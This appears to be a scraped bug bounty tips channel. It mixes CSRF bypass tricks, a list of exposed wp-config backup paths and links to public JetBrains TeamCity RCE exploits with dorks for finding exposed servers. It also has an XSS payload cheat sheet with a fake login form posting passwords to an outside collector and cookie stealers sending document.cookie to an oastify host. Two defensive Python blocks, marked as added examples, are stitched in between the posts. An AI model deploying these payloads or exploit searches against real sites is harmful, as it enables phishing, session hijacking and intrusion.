Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Thanks a lot guys, you guys are giving me positivity to go forward and learn new things
How to find Broken Authentication in 30 seconds or less using Autorize
👉 Setup your Autorize in Burp:
1. Proxy traffic through Burp
2. Browse the application
3. Select requests -> Extensions -> Autorize -> Send to Autorize
4. Check the "Unauthenticated" tab and column
🚨Here is a list of WP-exposed (wp-config sensitive) files!🚨
/wp-config.php-backup
/wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php
/wp-config.inc
/wp-config.old
/wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json
Bugbounty Practice Lab by TCM Security. Follow this guide to setup in Kali Linux!
Step 1: Installing required packages
sudo apt update
sudo apt upgrade
sudo apt install docker.io
sudo apt install docker-compose
Restart your Kali VM.
Step 2: Unpack the labs
Copy the labs to a directory on your system (e.g. /home/kali/labs)
cd /home/kali/labs
unzip bugbounty-v1.0.zip
cd bugbounty
sudo docker-compose up
The first time you run this it will take some time because it needs to download the docker images to your machine. Next time you run it, it should only take 5-30 seconds.
Step 3: Setup permissions
In a different terminal, navigate to where you unzipped the lab (e.g. /home/kali/labs/bugbounty) and run the set-permissions.sh script. This is used for labs that require write access, such as the file upload attacks.
./set-permissions.sh
Browse to http://localhost
The first time you load the lab the database will need to be initialized, just follow the instructions in the red box by clicking the link, then coming back to the homepage.
Enjoy your labs!
🌟DNS Enumeration 🌟
1. DIG:
- Importance: Command-line tool for querying DNS information.
2. Host:
- Importance: Command-line utility for DNS queries.
3. NMAP (dns-brute script):
- Importance: Network scanning tool to identify subdomains and IPs.
4. DNS Recon:
- Importance: Dedicated tool for automated DNS information gathering.
5. SecurityTrails:
- Importance: Online service for historical DNS data exploration.
Importance of DNS Enumeration:
- Subdomain Discovery: Identify potential entry points.
- IP Address Mapping: Understand target infrastructure.
- Vulnerability Assessment: Spot DNS misconfigurations.
- Attack Surface Mapping: Identify hosts and services.
- Information Gathering: Extract valuable domain-related data.
DNS enumeration is vital for comprehensively understanding a target's infrastructure and potential vulnerabilities during security assessments.
CSRF - Bypasses
1. Remove the entire token parameter with value/Remove just the value.
2. Use any other random but same length token.
3. Use any other random (length-1) or (length+1) token.
4. Use attacker's token in victim's session.
5. Change the method from POST to GET and remove the token.
6. If request is made through PUT or DELETE then try POST
7. If token is sent through custom header; try to remove the header.
8. Change the Content-Type to application/json, application/x-url-encoded or form-multipart, text/xml, application/xml.
9. If double submit token is there (in cookies and some header) then try CRLF injection.
10. Bypassing referrer check:
i. If the referrer header is checked but only when it exists in the request then add this piece of code in your csrf poc:
<meta name="referrer" content="never">
ii. Regex Referral bypass:
11. CSRF token stealing via xss/htmli/cors.
12. JSON Based:
i. Change the Content-Type to text/plain, application/x-www-form-urlencoded, multipart/form-data and check if it accepts.
ii. Use flash + 307 redirect.
13. Guessable CSRF token.
14. Clickjacking to strong CSRF token bypass.
15. Type Juggling.
16. Array: newemail=victim@gmail.com&csrftoken[]=lol
17. Set the csrf token to "null" or add null bytes.
18. Check whether csrf token is sent over http or sent to 3rd party. See here
19. Generate multiple csrf tokens, observe the static part. Keep it as it is and play with the dynamic part.
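A server-side token check that closes the bypass tricks listed above, added here as an example and not code from the channel; the in-memory session store, the session ids and the parameter name csrftoken are constructed assumptions.

```python
import hmac
import secrets

# Constructed in-memory session store standing in for the server-side session
# (hypothetical names; not part of the channel post).
SESSIONS = {
    "sess-victim": {"csrf": secrets.token_hex(16)},
    "sess-attacker": {"csrf": secrets.token_hex(16)},
}
TOKEN_LEN = 32  # hex length of a 16-byte random token; no static part to play with (tip 19)
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
ACCEPTED_CONTENT_TYPES = {
    "application/x-www-form-urlencoded", "multipart/form-data", "application/json",
}


def validate_csrf(method, session_id, content_type, params):
    """Accept a state-changing request only if it carries the token bound to its own session.

    `params` maps parameter name -> str | list | None, mirroring how frameworks
    hand over form/JSON bodies (a list value is how csrftoken[]=lol arrives).
    """
    # Tips 5, 6: the handler answers one documented verb; GET and verb swaps are refused.
    if method.upper() not in STATE_CHANGING:
        return False
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    # Tips 8, 12: parse the body only for the content types the endpoint documents.
    media_type = (content_type or "").split(";", 1)[0].strip().lower()
    if media_type not in ACCEPTED_CONTENT_TYPES:
        return False
    supplied = params.get("csrftoken")
    # Tips 1, 15, 16, 17: absent, array, None or any non-string value is rejected.
    if not isinstance(supplied, str):
        return False
    # Tips 2, 3, 17: exact length and hex alphabet only (no null bytes, no "null").
    if len(supplied) != TOKEN_LEN or any(c not in "0123456789abcdef" for c in supplied):
        return False
    # Tip 4: compare against *this* session's token, in constant time.
    return hmac.compare_digest(supplied, session["csrf"])
```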
If you got a chance to choose one thing!
What will you choose?
Guys let's discuss 🤘
<A HREF="http://evil.com/">Login Here </A>
<script>document.location.href="http://evil.com"</script>
<h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>
csp bypass:
<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'
iframe:
"><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>
cookie stealer:
<script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script>
<script>document.body.background="https://www.jhadol.com/images/photos/original/1465212129eukl.jpg";</script>
<script>window.location="https://coffinxp.000webhostapp.com/coffinxp1.html";</script>
<script>document.body.bgColor="red";</script>
Good morning, I have created a video on how to use @cipherinfo_bot. I have shown the demo here, you guys can check it out.
caution: education purpose only, i am not liable for anything.
CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity exploit
https://github.com/W01fh4cker/CVE-2024-27198-RCE
https://github.com/Chocapikk/CVE-2024-27198
https://github.com/rapid7/metasploit-framework/pull/18922
Cyberspace Mapping Dork:
Fofa: app="JET_BRAINS-TeamCity"
ZoomEye: app:"JetBrains TeamCity"
Hunter.how: product.name="TeamCity"
Shodan: http.component:"teamcity"
Read research: https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/
🚨SQLMC - SQL Injection Massive Checker🚨
📢SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
🔗Download https://github.com/malvads/sqlmc
New collection of bug bounty tips #6 is out!
1. Open arbitrary URL in Android app
2. Directory traversal payloads for easy wins
3. Find open redirect vulnerabilities with gf
4. Find out what websites are built with
5. Scanning at scale with Axiom
6. Trick to access admin panel by adding %20
7. Web servers on non-standard ports (Shodan)
8. Fingerprinting with Shodan and Nuclei engine
9. Generate custom wordlist from any domain
10. Account takeover by reset token disclosure (Burp)
11. Top 20+ Burp extensions for bug bounty hunting
12. Phpinfo() with sensitive information
13. Keep track of attack surface with Amass
https://www.infosecmatter.com/bug-bounty-tips-6-sep-07/
In God we TrUst, the Rest We TesT <3
Testing authentication
Burp extension to see what users can see (authorization)
basic auth brute force
Password quality rules, length, character set allowed (alphanumeric, upper/lower case and special characters). Empty Password? Empty username? 123456?
Test username enumeration
Test account recovery functionality, look for SMTP header injection.
Does remember me expire?
Test removing your email address from your account, add a new one, make sure that the old one can not be used to recover password/log in.
Delete an account without entering password or other sensitive operations, in case you forgot your computer logged in.
Password bruteforcing resilience. Application locks after some attempts?
Rate limiting in the change password functionality (forgot to log out in a cyber cafe? brute force the actual password using this feature). Does the application lock out an account after x number of login attempts?
Email verification links through http
Cookies: scope, httponly, secure flag.
Broken OAuth authentication, make sure ID tokens generated by google or third party are properly validated on the backend. https://developers.google.com/identity/sign-in/web/backend-auth#verify-the-integrity-of-the-id-token
Other strange access control methods such as referral validation (which can be bypassed https://t.co/z84ajd7bmO)
Does the remember me function ever expire? Is there room for exploit-ability in cookies combined with other attacks?
Test username uniqueness
How are logins processed, are they sent over http? Are details sent in a POST request or are they included in the URL (this is bad if they are, especially passwords)?
Test NULL %00 characters in the username and password fields.
Test for fail-open conditions. Fail-open authentication is the situation when the user authentication fails but results in providing open access to authenticated and secure sections of the web application to the end user.
Cookie poisoning. Try requesting the cookie names in the query string and body, some servers might read the parameters and set them as cookies. This can allow cookie poisoning.
Set new password with old password
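An audit of the cookie items in the checklist above (scope, HttpOnly, Secure flag, remember-me expiry), added here as an example rather than code from the post; the sample Set-Cookie headers and the 30-day lifetime policy are constructed assumptions.

```python
# Constructed sample Set-Cookie values (hypothetical cookie names) as a server might emit them.
SAMPLE_HEADERS = [
    "sessionid=9f1c2a; Path=/; Secure; HttpOnly; SameSite=Lax",
    "remember_me=tok-42; Domain=.example.com; Path=/; Max-Age=31536000",
    "PHPSESSID=abc123; Path=/; SameSite=None; Secure",
]
MAX_PERSISTENT_SECONDS = 30 * 24 * 3600  # assumed policy: persistent logins expire within 30 days


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, {attribute_lowercase: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # flag attributes get an empty value
    return name.strip(), value, attrs


def audit_set_cookie(header):
    """Return the checklist findings for one Set-Cookie header (empty list = clean)."""
    _, _, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure")            # cookie also travels over plain http
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")          # readable by injected script
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict")   # browser gives no cross-site help
    if attrs.get("domain"):
        findings.append("Domain widens scope to all subdomains")  # scope check
    max_age = attrs.get("max-age")
    if max_age and max_age.isdigit() and int(max_age) > MAX_PERSISTENT_SECONDS:
        findings.append("lifetime exceeds 30 days")  # does "remember me" ever expire?
    return findings


def audit_all(headers=SAMPLE_HEADERS):
    """Map cookie name -> findings for every header; a clean run is all empty lists."""
    return {parse_set_cookie(h)[0]: audit_set_cookie(h) for h in headers}
```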